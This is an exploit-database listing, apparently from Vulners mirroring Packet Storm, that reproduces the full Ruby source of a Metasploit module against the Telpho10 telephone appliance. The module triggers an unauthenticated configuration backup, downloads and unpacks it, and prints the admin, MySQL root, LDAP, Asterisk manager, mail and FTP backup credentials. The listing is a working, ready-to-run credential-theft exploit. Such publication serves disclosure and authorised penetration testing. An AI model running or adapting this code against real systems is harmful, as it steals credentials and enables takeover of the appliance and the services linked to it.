Vulners
Lucene search
Telpho10 Backup Credentials Dumper
🗓️ 31 Aug 2024 00:00:00Reported by Jan Rude, metasploit.comType 
packetstorm🔗 packetstormsecurity.com👁 143 Views
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Telpho10 Backup Credentials Dumper',
'Description' => %q{
This module exploits a vulnerability present in all versions of Telpho10 telephone system
appliance. This module generates a configuration backup of Telpho10,
downloads the file and dumps the credentials for admin login,
phpmyadmin, phpldapadmin, etc.
This module has been successfully tested on the appliance versions 2.6.31 and 2.6.39.
},
'Author' => 'Jan Rude', # Vulnerability Discovery and Metasploit Module
'License' => MSF_LICENSE,
'References' => ['URL', 'https://github.com/whoot/TelpOWN'],
'Platform' => 'linux',
'Privileged' => false,
'DisclosureDate' => '2016-09-02'
)
)
register_options(
[
Opt::RPORT(80)
]
)
end
# Used for unpacking backup files
def untar(tarfile)
destination = tarfile.split('.tar').first
FileUtils.mkdir_p(destination)
File.open(tarfile, 'rb') do |file|
Rex::Tar::Reader.new(file) do |tar|
tar.each do |entry|
dest = File.join(destination, File.basename(entry.full_name))
next unless entry.file?
File.open(dest, 'wb') do |f|
f.write(entry.read)
end
File.chmod(entry.header.mode, dest)
end
end
end
return destination
end
# search for credentials in backup file
def dump_creds(mysql_file)
file = File.new(mysql_file, 'r')
while (line = file.gets)
if line.include? 'adminusername'
config = [line]
end
end
file.close
print_status('Login (/telpho/login.php)')
print_status('-------------------------')
print_good("Username: #{config.first[/adminusername','(.*?)'/, 1]}")
print_good("Password: #{config.first[/adminpassword','(.*?)'/, 1]}\n")
print_status('MySQL (/phpmyadmin)')
print_status('-------------------')
print_good('Username: root')
print_good("Password: #{config.first[/dbpassword','(.*?)'/, 1]}\n")
print_status('LDAP (/phpldapadmin)')
print_status('--------------------')
print_good('Username: cn=admin,dc=localdomain')
print_good("Password: #{config.first[/ldappassword','(.*?)'/, 1]}\n")
print_status('Asterisk MI (port 5038)')
print_status('-----------------------')
print_good("Username: #{config.first[/manageruser','(.*?)'/, 1]}")
print_good("Password: #{config.first[/managersecret','(.*?)'/, 1]}\n")
print_status('Mail configuration')
print_status('------------------')
print_good("Mailserver: #{config.first[/ipsmarthost','(.*?)'/, 1]}")
print_good("Username: #{config.first[/mailusername','(.*?)'/, 1]}")
print_good("Password: #{config.first[/mailpassword','(.*?)'/, 1]}")
print_good("Mail from: #{config.first[/mailfrom','(.*?)'/, 1]}\n")
print_status('Online Backup')
print_status('-------------')
print_good("ID: #{config.first[/ftpbackupid','(.*?)'/, 1]}")
print_good("Password: #{config.first[/ftpbackuppw','(.*?)'/, 1]}\n")
end
def run
res = send_request_cgi({
'uri' => '/telpho/system/backup.php',
'method' => 'GET'
})
if res && res.code == 200
print_status('Generating backup')
sleep(1)
else
print_error('Could not find vulnerable script. Aborting.')
return nil
end
print_status('Downloading backup')
res = send_request_cgi({
'uri' => '/telpho/temp/telpho10.epb',
'method' => 'GET'
})
if res && res.code == 200
if res.body.to_s.bytesize == 0
print_error('0 bytes returned, file does not exist or is empty.')
return nil
end
path = store_loot(
'telpho10.backup',
'application/x-compressed',
datastore['RHOST'],
res.body,
'backup.tar'
)
print_good("File saved in: #{path}")
begin
extracted = untar(path.to_s)
mysql = untar("#{extracted}/mysql.tar")
rescue StandardError
print_error('Could not unpack files.')
return nil
end
begin
print_status("Dumping credentials\n")
dump_creds("#{mysql}/mysql.epb")
rescue StandardError
print_error('Could not find credential file.')
return nil
end
else
print_error('Failed to download backup file.')
return nil
end
rescue ::Rex::ConnectionError
print_error("#{rhost}:#{rport} - Failed to connect")
return nil
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
31 Aug 2024 00:00Current
7.4High risk
Vulners AI Score7.4